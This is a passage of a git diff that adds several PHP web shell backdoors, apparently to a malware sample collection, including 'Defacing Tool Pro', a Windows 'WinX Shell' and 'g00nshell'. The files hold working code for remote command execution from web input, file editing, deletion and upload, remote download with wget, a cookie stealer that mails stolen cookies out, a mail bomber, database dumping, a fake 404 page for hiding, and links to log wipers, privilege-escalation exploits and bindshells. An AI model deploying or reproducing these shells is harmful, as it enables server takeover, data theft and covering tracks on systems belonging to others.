QdDZSZmYmdYPkNmqGJEW4ZmRXN3XjJIy0WP56sjeOBDd5NnePpGd2MnaW5CZtEiciYSZV4oWRBUl8JjiCIkumhVqBUih75xGvNXh9N0ucBnge4UkAUCAmF2rz4TpJxBNK1QHE9IeW9xMscAIap0zLZIjNtAOKuAM2JCtCYGsukGv8l2JGAGxEQARGQATR003G8TBqUXtlIBd0wAbf4wie8G8Stgu1MQq00Iq08AvWNhjHgAza5gzBIA3dsA3d5g39BFEHFA3RoIsKhGDdoA3YMA3ddwywSAu8MH7/EjD9dortpwkCVwiEUAhsQRwNEwZQcAWtV4m+VokqNI4pJonUYRU5JRU8FTIygEOm8moaRxQzlh7F1B43cZCPM9FLJlcTSvRLLaEBP+ZyGGhbFPCBH1hzBhJWMTchYNQARXNzQHdGMHIhDjJ0bsVldBRHWkNXYSYjRgI2UFd1fbUQVqOEVYMQGgFnhtQkauJIf2NYkuN1cPI4cvM4aweGggJKEdFZiDM3n7STBQFKkjU4e1Y5gAYRmJNascSGpaRpSylbhid4otOGrLVKAQEAOw==","download" => "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "edit" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs="); + +//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable +if (isset($_GET['img'])) +{ +header("Content-type: image/gif"); +echo base64_decode($images[$_GET['img']]); +die(); +} +//Sets the directory to the directory specified +if (isset($_GET['dir'])) +{ + $current_dir = realpath($_GET['dir'])."/"; +} +else +{ + $current_dir = './'; +} + +//Run a CLI command if one has been sent +if (isset($_POST['CLICommand'])) +{ + echo "
";
+	echo "Output From Command: 
";
+	echo "";
+	echo "
"; + die(); +} + +//set the current_dir url +if (($current_dir == './') && (!isset($_COOKIE['dshell']))) +{ + $surl = $_SERVER['REQUEST_URI']; + setcookie('dshell',$surl,time()+99999); +} +elseif (!isset($_COOKIE['dshell'])) + die('Error Could Not load the default path'); +else + $surl = $_COOKIE['dshell']; + +function scan_dir($current_dir) +{ +$chemin=$current_dir; +if (glob("$chemin*")) +{ +$files = glob("$chemin*"); +$fileListing = ""; +foreach ($files as $filename) { + $fileListing .= "$filename-<"; + } + $listing = explode('-<',$fileListing); + return $listing; + } + else + { + die("Couldn't Read directory, Blocked!!!"); + } +} + +//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p +//Anyway this function gets the permssions in rwx form thats read write execute format. +function perms_check($file) +{ + $perms = fileperms($file); + +if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; +} else { + // Unknown + $info = 'u'; +} + +// Owner +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + +// Group +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + +// World +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + + return $info; +} + + +//Function to display the files in the current_dir variable +function dir_scan($current_dir) { +$output="FilenamePermissionsActions\n +.\n +.."; +$output_left=""; +foreach(scan_dir($current_dir) as $item) +{ + if ($item == "." || $item == "..") + { + $item = str_replace($current_dir,"",$item); + $output .= "". + "".$item."". + "". + ""; + + } + else + { + if ($item == "") + { } + else + { + if (is_dir($item)) + { + $perms = perms_check($item); + $item = str_replace($current_dir,"",$item); + $output .=""."".$item."$perms  "; + } + else + { + $perms = perms_check($item); + $item = str_replace($current_dir,"",$item); + $output_left .= "". + "".$item."". + "$perms". + "
". + ""; + } + } + } +} + $output .=$output_left; + return $output; +} + +//Edit File Function, $mode can be r(read) w(write) +//Content is needed only if writing +function fedit($fileLocale,$mode,$content = "") +{ + if ($mode == "r") + { + $output = htmlspecialchars(file_get_contents($fileLocale)); + return $output; + } + elseif ($mode == "w") + { + if ($content == "") + echo("Error No Content Provided!"); + else { + $file = fopen($fileLocale,"w"); + if (fwrite($file,stripslashes($content))) + { + $value = 1; + } + else + $value = 0; + fclose($file); + return $value; + } + } +} + +//Function for showing the edit page. +function edit($file) +{ + return "
+
"; +} + +//Setup the Action +if (!isset($_GET['action'])) +{ + $action = dir_scan($current_dir); +} +elseif ($_GET['action'] == 'edit') +{ + $action = edit($_GET['file']); +} +elseif ($_GET['action'] == 'write') +{ + if (fedit($_GET['file'],'w',$_POST['content'])) + $action = "Successful"; + else + $action = "Error Writing File, Possible Permission Problem"; +} +elseif ($_GET['action'] == 'download') +{ + $filename = $_GET['file']; + $filename = trim($filename); + $file = $path.$filename; + $file_size = filesize($file); + if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) { + header("Content-Type: doesn/matter"); + header("Content-Disposition: filename=$filename"); + header("Content-Transfer-Encoding: binary"); + header("Pragma: no-cache"); + header("Expires: 0"); + } + else { + Header("Content-type: file/unknown"); + Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename)); + Header("Content-Description: PHP3 Generated Data"); + header("Pragma: no-cache"); + header("Expires: 0"); + } + + if (is_file("$file")) { + $fp = fopen("$file", "r"); + if (!fpassthru($fp)) + fclose($fp); + } + die(); +} + +//Actual Output +echo "\n"; +echo "
\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo $action; +echo ""; +echo "\n"; +echo "
Operating System Information: ".php_uname()."
Server Running As: ".get_current_user()."
Current Directory: ".wordwrap(realpath($current_dir),100,'
')."
 
Run Command:
\n"; +echo "\n"; + +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.b b/PHP/Backdoor.PHP.WebShell.b new file mode 100644 index 00000000..6284c1c3 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.b @@ -0,0 +1,84 @@ + +EXPLOIT.PHP.BROWSER +

EXPLOIT.PHP.BROWSER

+ "") { +chdir($dir_baru); +$dir_kerja = exec("pwd"); +} +?> +
+

Active directory : +Root/"; +if ($split_dir_kerja[0] == "") { +$dir_kerja = "/"; +} else { +for ($i = 0; $i < count($split_dir_kerja); $i++) { +$url .= "/" . $split_dir_kerja[$i]; +echo "$split_dir_kerja[$i]/"; +} +} +// See you can look at many virtual host +?> +

+

Choose your new work directory

+ + +

Perintah :

+ > +

+

Perapian stderr diperlukan? +

+

Hasil Eksekusi :

+ +
+ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.f b/PHP/Backdoor.PHP.WebShell.f new file mode 100644 index 00000000..fa0255b7 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.f @@ -0,0 +1,214 @@ + +xterm at /usr/X11R6/bin/xterm, "; +if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, "; +if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, "; +if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, "; +if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, "; +if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc "; +$safe = @ini_get($safemode); +if ($safe) $pro8="safe_mode: YES, "; else $pro7="safe_mode: NO, "; +$pro8 = "PHP ".phpversion(); +$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8; +$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid(); +$ip=@gethostbyname($_SERVER['HTTP_HOST']); + +//Turns the 'ls' command more usefull, showing it as it looks in the shell +if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd); +else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd); +else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd); +else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd); +else if($cmd=='ls') $cmd = "ls -F"; + +//If there are some '//' in the cmd, its now removed +if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir); +?> + + + + + + + + + +
[ Defacing Tool Pro v ] ?
+by r3v3ng4ns - revengans@gmail.com +
+ + + + + + + + +
:
user: uid() euid() gid()
write permission:YES"; }else{ echo " no"; } ?>
server info:
pro info: ip
original path:
current path: +
+
+ +
command
 + +
+ array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){ + $process = @proc_open("$what",$descpec,$pipes); + if (is_resource($process)) { + fwrite($pipes[0], ""); + fclose($pipes[0]); + + while(!feof($pipes[2])) { + $erro_retorno = fgets($pipes[2], 4096); + if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros + } + fclose($pipes[2]); + + while(!feof($pipes[1])) { + echo fgets($pipes[1], 4096); + } + fclose($pipes[1]); + + $ok_p_fecha = @proc_close($process); + }else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function"; +}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini"; +} + +$funE="function_exists"; +if($safe){$fe="safemode";$feshow=$fe;} +elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";} +elseif($funE('passthru')){$fe="passthru";$feshow=$fe;} +elseif($funE('system')){$fe="system";$feshow=$fe;} +elseif($funE('exec')){$fe="execc";$feshow="exec";} +elseif($funE('popen')){$fe="popenn";$feshow="popen";} +elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";} +else {$fe="nofunction";$feshow=$fe;} +if($fu!="0" or !empty($fu)){ + if($fu==1){$fe="passthru";$feshow=$fe;} + if($fu==2){$fe="system";$feshow=$fe;} + if($fu==3){$fe="execc";$feshow="exec";} + if($fu==4){$fe="popenn";$feshow="popen";} + if($fu==5){$fe="shell";$feshow="shell_exec";} + if($fu==6){$fe="procc";$feshow="proc_open";} +} +$fe("$cmd 2>&1"); +$output=ob_get_contents();ob_end_clean(); +?> +

+ +

stdOut from $cmdShow\", using $feshow()";?>
+
r3v3ng4ns +//-> there's no patch for the stupidity of mankind +--> +X11 at /usr/X11R6/, ";//procura a pasta do x11 +if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="xterm at /usr/X11R6/bin/xterm, ";//procura o xterm +if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, ";//procura o netcat +if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, ";//procura o wget +if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, ";//procura o lynx +if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, ";//procura o gcc +if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc ";//procura o cc +$pro=$pro0.$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;//junta tudo numa variavel + +$ip=@gethostbyname($_SERVER['HTTP_HOST']);//mostra o ip do usuario + +//arqui, se a $cmd tiver o comando 'ls', adiciona-se o parametro '-F' aa 'ls', deixando +//'ls -F', mas procura-se manter os outros parametros que o usuario deixou para o ls. +//par isso definiu o $cmdshow lah em cima, isso aqui o usuario nao sabe. o parametro +//'-F' no ls facilita a visualizacao dos arquivos. +if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);} +else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);} +else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);} +else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);} +else if($cmd=='ls'){$cmd = "ls -F";} + +//se houverem '//' no $chdir, aki sao removidas +if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir); +?> + + + + + + + + + +
[ Defacing Tool Pro v ] ?
+by r3v3ng4ns - revengans@hotmail.com +
+ + + + + + + + +
:
user: uid() euid() gid()
write permission:YES"; }else{ echo " no"; } ?>
server info:
pro info: ip
original path:
current path: +
+
+ +
command
 +
+&1') +$fe("$cmd 2>&1"); +$output=ob_get_contents();ob_end_clean(); +?> +
+

stdOut from $cmdshow\", using $feshow()";?>
+
diff --git a/PHP/Backdoor.PHP.WebShell.u b/PHP/Backdoor.PHP.WebShell.u new file mode 100644 index 00000000..6238d4c4 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.u @@ -0,0 +1,103 @@ +-:[GreenwooD]:- WinX Shell + +"; +print ""; +print "You:" ; +print " ".$_SERVER['REMOTE_ADDR']." [".$host."] " ; +print ""; +print ""; +print "Version OS:" ; +print " $veros "; +print ""; +print ""; +print "Server:"; +print "".$_SERVER['SERVER_SIGNATURE'].""; +print ""; +print ""; +print "Win Dir:"; +print " $windir "; +print ""; +print ""; +print "
"; + +//------- [netstat -an] and [ipconfig] and [tasklist] ------------ +print "
"; +print ""; +print "   "; +print ""; +print "   "; +print ""; +print "
"; +//------------------------------- + + +//------------------------------- + +print ""; +print "
"; + +//------------------------------- + +print "
"; +print "CMD: "; +print "
"; +print ""; +print " "; +print "
"; + +//------------------------------- + +print "
"; +print "Upload:"; +print "
"; +print ""; +print "File: "; +print " Filename on server: "; +print" "; +print"
"; + +?> + + + + + +
Created by -:[GreenwooD]:-
+ \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.w b/PHP/Backdoor.PHP.WebShell.w new file mode 100644 index 00000000..38c6badf --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.w @@ -0,0 +1,730 @@ +document.location.href= # +#'http://site.com/shl.php?cookie='+document.cookies # +##########################VERIFICATION LEVELS######################### +#0: No protection; anyone can access # +#1: User-Agent required # +#2: Require IP # +#3: Basic Authentication # +##############################KNOWN BUGS############################## +#Windows directory handling # +# # +#The SQL tool is NOT complete. There is currently no editing function# +#available. Some time in the future this may be fixed, but for now # +#don't complain to me about it # +################################SHOUTS################################ +#pr0be - Beta testing & CSS # +#TrinTiTTY - Beta testing # +#clorox - Beta testing # +#Everyone else at g00ns.net # +########################NOTE TO ADMINISTRATORS######################## +#If this script has been found on your server without your approval, # +#it would probably be wise to delete it and check your logs. # +###################################################################### +*/ + +// Configuration +$auth = 0; +$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent +$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell +$email = ""; // E-mail address where cookies will be sent +$user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User +$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password + +// Global Variables +$version = "1.3 final"; +$self = $_SERVER['PHP_SELF']; +$soft = $_SERVER["SERVER_SOFTWARE"]; +$servinf = split("[:]", getenv('HTTP_HOST')); +$servip = $servinf[0]; +$servport = $servinf[1]; +$uname = php_uname(); +$curuser = @exec('whoami'); +$cmd = $_GET['cmd']; +$act = $_GET['act']; +$cmd = $_GET['cmd']; +$cookie = $_GET['cookie']; +$f = $_GET['f']; +$curdir = cleandir(getcwd()); +if(!$dir){$dir = $_GET['dir'];} +elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];} +elseif($dir && $_SESSION['dir']){$dir = $curdir;} +if($dir && $dir != "nullz"){$dir = cleandir($dir);} +$contents = $_POST['contents']; +$gf = $_POST['gf']; +$img = $_GET['img']; +session_start(); +@set_time_limit(5); +switch($auth){ // Authentication switcher + case 0: break; + case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break; + case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break; + case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break; +} + +function userauth(){ // Basic authentication function + global $user, $pass; + header("WWW-Authenticate: Basic realm='Secure Area'"); + if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){ + hide(); + die(); + } +} + +if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();} +elseif(!$act && $cmd){ + style(); + echo("Results:\n
"); +} +elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function +elseif($act == "view" && $f && $dir){view($f, $dir);} +elseif($img){img($img);} +elseif($gf){grab($gf);} +elseif($dir){files($dir);} +else{ + switch($act){ + case "phpinfo": phpinfo();break; + case "sql": sql();break; + case "files": files($dir);break; + case "email": email();break; + case "cmd": cmd();break; + case "upload": upload();break; + case "tools": tools();break; + case "sqllogin": sqllogin();break; + case "sql": sql();break; + case "lookup": lookup();break; + case "kill": kill();break; + case "phpexec": execphp();break; + default: main();break; + } +} + +function cleandir($d){ // Function to clean up the $dir and $curdir variables + $d = realpath($d); + $d = str_replace("\\\\", "//", $d); + $d = str_replace("////", "//", $d); + $d = str_replace("\\", "/", $d); + return($d); +} + + + +function hide(){ // Hiding function + global $self, $soft, $servip, $servport; +die(" + +404 Not Found + +

Not Found

+The requested URL $self was not found on this server.

+

Additionally, a 404 Not Found +error was encountered while trying to use an ErrorDocument to handle the request. +

+
$soft Server at $servip Port $servport
+"); +} + +function style(){ // Style / header function + global $servip,$version; + echo("\n + \n + g00nshell v" . $version . " - " . $servip . "\n + \n + \n"); +} + +function main(){ // Main/menu function + global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version; + style(); + $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', + 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell'); + $capt = array_flip($act); + echo("
"); + echo("Host: " . $servip . "
"); + echo("Server software: " . $soft . "
"); + echo("Uname: " . $uname . "
"); + echo("Shell Directory: " . getcwd() . "
"); + echo(""); + echo("[ More ] "); + echo("[ Less ]"); + echo("
"); + echo("

Links

"); + if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ " . $link . " ] ");}} + else{foreach($act as $link){echo("[ " . $link . " ] ");}} + echo("
"); + echo("
"); + echo("
"); + echo("
:: g00nshell v" . $version . " ::
"); + die(); +} + +function cmd(){ // Command execution function + style(); + echo(""); + echo("Command:
"); + echo(" "); + echo("
\n"); + echo("\n"); + echo("
\n"); + if($_POST['cmd'] != ""){$x = $_POST['cmd'];} + elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];} + else{die();} + echo("Results:
"); +} + +function execphp(){ // PHP code execution function + style(); + echo("

Execute PHP Code

"); + echo("
"); + echo("\n
\n"); + echo(""); + echo("
"); + if($_POST['phpexec']){ + echo(""); + } +} + +function sqllogin(){ // MySQL login function + session_start(); + if($_SESSION['isloggedin'] == "true"){ + header("Location: ?act=sql"); + } + style(); + echo("
"); + echo("User:

\n"); + echo("Password:

\n"); + echo("Host:

\n"); + echo("Port:

\n"); + echo(""); + echo("
"); + die(); +} + +function sql(){ // General SQL Function + session_start(); + if(!$_GET['sqlf']){style();} + if($_POST['un'] && $_POST['pw']){; + $_SESSION['sql_user'] = $_POST['un']; + $_SESSION['sql_password'] = $_POST['pw']; + } + if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];} + else{$_SESSION['sql_host'] = 'localhost';} + if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];} + else{$_SESSION['sql_port'] = '3306';} + + if($_SESSION['sql_user'] && $_SESSION['sql_password']){ + if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){ + unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); + echo("Invalid credentials
\n"); + die(sqllogin()); + } + else{ + $_SESSION['isloggedin'] = "true"; + } + } + else{ + die(sqllogin()); + } + + if ($_GET['db']){ + mysql_select_db($_GET['db'], $sqlcon); + if($_GET['sqlquery']){ + $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); + $num = mysql_num_rows($dat); + for($i=0;$i<$num;$i++){ + echo(mysql_result($dat, $i) . "
\n"); + } + } + else if($_GET['table'] && !$_GET['sqlf']){ + echo("Insert Row

\n"); + echo(""); + $query = "SHOW COLUMNS FROM " . $_GET['table']; + $result = mysql_query($query, $sqlcon) or die(mysql_error()); + $i = 0; + $fields = array(); + while($row = mysql_fetch_assoc($result)){ + array_push($fields, $row['Field']); + echo(""); + for($i=0;$i" . $row[0] . ""); + } + } + echo("\n"); + } + } + $y++; + } + echo("
" . $fields[$i]); + $i++; + } + $result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); + $num_rows = mysql_num_rows($result) or die(mysql_error()); + $y=0; + for($x=1;$x<=$num_rows+1;$x++){ + if(!$_GET['p']){ + $_GET['p'] = 1; + } + if($_GET['p']){ + if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ + echo("
\n"); + for($z=1;$z<=ceil($num_rows / 30);$z++){ + echo("" . $z . " | "); + } + } + elseif($_GET['table'] && $_GET['sqlf']){ + switch($_GET['sqlf']){ + case "dl": sqldownload();break; + case "ins": sqlinsert();break; + default: $_GET['sqlf'] = ""; + } + } + else{ + echo(""); + $query = "SHOW TABLES FROM " . $_GET['db']; + $dat = mysql_query($query, $sqlcon) or die(mysql_error()); + while ($row = mysql_fetch_row($dat)){ + echo("\n"); + } + echo("
" . $row[0] . "[Download]
"); + } + } + else{ + $dbs=mysql_list_dbs($sqlcon); + while($row = mysql_fetch_object($dbs)) { + echo("" . $row->Database . "
\n"); + } + } + mysql_close($sqlcon); +} + +function sqldownload(){ // Download sql file function + @ob_flush; + $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); + mysql_select_db($_GET['db'], $sqlcon); + $query = "SHOW COLUMNS FROM " . $_GET['table']; + $result = mysql_query($query, $sqlcon) or die(mysql_error()); + $fields = array(); + while($row = mysql_fetch_assoc($result)){ + array_push($fields, $row['Field']); + $i++; + } + $result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); + $num_rows = mysql_num_rows($result) or die(mysql_error()); + for($x=1;$x<$num_rows;$x++){ + $out .= "("; + for($i=0;$i\nGo back"); + } + $query = "SHOW COLUMNS FROM " . $_GET['table']; + $result = mysql_query($query, $sqlcon) or die(mysql_error()); + $i = 0; + $fields = array(); + echo("
"); + echo(""); + while($row = mysql_fetch_assoc($result)){ + array_push($fields, $row['Field']); + echo("
" . $fields[$i] . "
\n"); + $i++; + } + echo("
"); + echo("
\n"); + echo("
"); +} + +function nicesize($size){ + if(!$size){return false;} + if ($size >= 1073741824){return(round($size / 1073741824) . " GB");} + elseif ($size >= 1048576){return(round($size / 1048576) . " MB");} + elseif ($size >= 1024){return(round($size / 1024) . " KB");} + else{return($size . " B");} +} + +function files($dir){ // File manipulator function + style(); + global $self, $curdir; + if($dir==""){$dir = $curdir;} + $dirx = explode("/", $dir); + $files = array(); + $folders = array(); + echo("
"); + echo(""); + echo(""); + echo("
"); + echo("

File list for "); + for($i=0;$i$dirx[$i]" . "/"); + } + echo("

"); + echo(""); + echo(""); + if ($handle = opendir($dir)) { + while (false != ($link = readdir($handle))) { + if (is_dir($dir . '/' . $link)){ + $file = array(); + if(is_writable($dir . '/' . $link)){$file['perm']='write';} + elseif(is_readable($dir . '/' . $link)){$file['perm']='read';} + else{$file['perm']='none';} + switch($file['perm']){ + case "write": @$file['link'] = "$link"; break; + case "read": @$file['link'] = "$link"; break; + case "none": @$file['link'] = "$link"; break; + default: @$file['link'] = "$link"; break; + } + @$file['icon'] = "folder"; + if($_SERVER['QUERY_STRING']){$folder = " " . $file['link'];} + else{$folder = " " . $file['link'];} + array_push($folders, $folder); + } + else{ + $file = array(); + $ext = strtolower(end(explode(".", $link))); + if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){ + $file['size'] = "0B"; + } + if(is_writable($dir . '/' . $link)){$file['perm']='write';} + elseif(is_readable($dir . '/' . $link)){$file['perm']='read';} + else{$file['perm']='none';} + switch($file['perm']){ + case "write": @$file['link'] = "$link"; break; + case "read": @$file['link'] = "$link"; break; + case "none": @$file['link'] = "$link"; break; + default: @$file['link'] = "$link"; break; + } + switch($ext){ + case "exe": case "com": case "jar": case "": $file['icon']="binary"; break; + case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break; + case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break; + case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break; + case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break; + case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break; + default: $file['icon'] = "unknown"; break; + } + if($_SERVER['QUERY_STRING']){$file = "\n";} + else{$file = "\n";} + array_push($files, $file); + } + } + foreach($folders as $folder){echo("\n");} + foreach($files as $file){echo($file);} + echo("
File NameFile Size
" . $file['link'] . "" . $file['size'] . "
" . $file['link'] . "" . $file['size'] . "
$folderDIR
"); + closedir($handle); + } +} + +function email(){ // Email bomber function + $times = $_POST['times']; + $to = $_POST['to']; + $subject = $_POST['subject']; + $body = $_POST['body']; + $from = $_POST['from']; + + style(); + echo("

Mail Bomber

+
+ Your address:
+
+ Their address:
+
+ Subject:
+
+ Text:
+
+ How many times:
+

+ +
"); + if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}} +} + +function view($filename, $dir){ // File view function + if($_POST['fileact'] == "Download"){ + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($_POST['contents'])); + header("Content-disposition: attachment; filename=" . basename($filename) . ";"); + $handle = fopen($filename, "r"); + echo(fread($handle, filesize($filename))); + die(); + } + style(); + if($_POST['contents'] && $_POST['fileact'] == "Save"){ + $handle = fopen($filename, 'w'); + fwrite($handle, stripslashes($_POST['contents'])); + fclose($handle); + echo("Saved file.

"); + echo("Go back"); + die(); + } + elseif($_POST['fileact'] == "Delete"){ + unlink($filename); + echo("Deleted file.

"); + echo("Go back"); + die(); + } + + if($dir != "nullz"){ // heh + $filename = $dir."/".$filename; + } + $bad = array("<", ">"); + $good = array("<", ">"); + $file = fopen($filename, 'r'); + $content = fread($file, @filesize($filename)); + echo("
"); + echo(""); + echo(""); + echo(""); + echo(""); + echo("
"); +} + +function edit($file, $contents){ // File edit function + style(); + $handle = fopen($file, 'w'); + fwrite($handle, $contents); + fclose($handle); + echo("Saved file.

"); + echo("Go back"); +} + +function upload(){ // Uploading frontend function + global $curdir; + style(); + echo("
+ Output Directory
+

+ Remote Upload
+ +

+ Local File Upload
+ + +

"); + + if($_POST['rem']){grab($_POST['rem']);} + if($_FILES['up']){up($_FILES['up']);} +} + +function up($up){ // Uploading backend function + style(); + $updir = $_POST['loc']; + move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]); + die("File has been uploaded."); +} + +function grab($file){ // Uploading backend function + style(); + $updir = $_POST['loc']; + $filex = array_pop(explode("/", $file)); + if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");} + else{die("File upload failed.");} +} + +function tools(){ // Useful tools function + global $curdir; + style(); + $tools = array( + "--- Log wipers ---"=>"1", + "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", + "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", + "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", + "--- Priv Escalation ---"=>"2", + "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", + "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", + "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", + "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", + "--- Bindshells ---"=>"3", + "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", + 